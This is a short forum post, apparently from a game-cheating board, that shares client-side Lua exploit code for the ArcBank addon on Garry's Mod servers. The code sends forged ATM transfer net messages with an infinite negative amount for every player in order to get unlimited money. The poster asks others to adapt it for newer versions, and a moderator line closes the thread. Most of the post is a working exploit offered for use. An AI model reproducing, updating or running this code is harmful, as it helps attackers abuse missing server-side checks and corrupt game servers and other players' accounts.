Gmod arc bank exploit
So previously aritz posted an exploit that gives you unlimited money if the server is using an old free version of arcbank.
[for k,v in pairs(player.GetHumans()) do
timer.Simple(k,function()
local accdata = {}
accdata[ARCBANK_PLAYER] = v:SteamID()
accdata[ARCBANK_NAMETO] = ""
accdata[ARCBANK_NAME] = ""
accdata[ARCBANK_MONEY] = -math.huge
net.Start( "ARCATM_COMM" )
net.WriteEntity(LocalPlayer():GetEyeTrace().Entity )
net.WriteInt(ARCBANK_ATM_TRANSFER,ARCBANK_ATMBITRA TE)
net.WriteTable(accdata)
net.SendToServer()
end)
end]
^ the code. I was wondering if someone could modify it so it would work on newer versions of the mod.
Thanks :* -Fooz
1 week has passed and no further replies have been made by the OP. Assuming solved.
/Closed.